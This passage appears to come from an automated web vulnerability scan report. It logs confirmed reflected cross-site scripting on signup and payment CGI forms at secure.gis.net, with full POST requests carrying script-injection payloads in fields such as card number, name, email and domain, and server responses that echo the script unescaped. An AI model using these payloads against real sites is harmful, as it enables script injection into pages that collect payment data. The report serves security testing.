FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x00109E)%3c%2fscript%3e&CCNUM=3&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal4=39.95&monthlytotal=39.95&Activation_Fee=Activation_Fee&onetimetotal0=0&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:19:52 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x00109E)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
CARDTYPE POST MC
CCNUM POST '"--><script>alert(0x00109F)</script>
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal4 POST 39.95
monthlytotal POST 39.95
Activation_Fee POST Activation_Fee
onetimetotal0 POST 0
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 701
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&CARDTYPE=MC&CCNUM='%22--%3e%3cscript%3enetsparker(0x00109F)%3c%2fscript%3e&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal4=39.95&monthlytotal=39.95&Activation_Fee=Activation_Fee&onetimetotal0=0&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:19:54 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: MC <P>'"><script>netsparker(0x00109F)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST '"--><script>alert(0x001690)</script>
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 139
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME='%22--%3e%3cscript%3enetsparker(0x001690)%3c%2fscript%3e&EMAIL=netsparker%40example.com&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:10 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001690)</script>"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST '"--><script>alert(0x001693)</script>
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 127
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL='%22--%3e%3cscript%3enetsparker(0x001693)%3c%2fscript%3e&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:13 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001693)</script>"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST '"--><script>alert(0x001696)</script>
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET='%22--%3e%3cscript%3enetsparker(0x001696)%3c%2fscript%3e&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:15 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001696)</script>"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST '"--><script>alert(0x001699)</script>
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET=3&CITY='%22--%3e%3cscript%3enetsparker(0x001699)%3c%2fscript%3e&STATE=3&ZIP=3&PHONE=3&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:18 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x001699)</script>"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST '"--><script>alert(0x0016C0)</script>
DOMAIN POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE='%22--%3e%3cscript%3enetsparker(0x0016C0)%3c%2fscript%3e&DOMAIN=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:40 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x0016C0)</script>"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
NAME POST Ronald Smith
EMAIL POST netsparker@example.com
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
DOMAIN POST '"--><script>alert(0x0016C3)</script>

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 150
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

NAME=Ronald+Smith&EMAIL=netsparker%40example.com&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&DOMAIN='%22--%3e%3cscript%3enetsparker(0x0016C3)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:50:44 GMT
Server: Apache
Connection: close
Content-Type: text/html


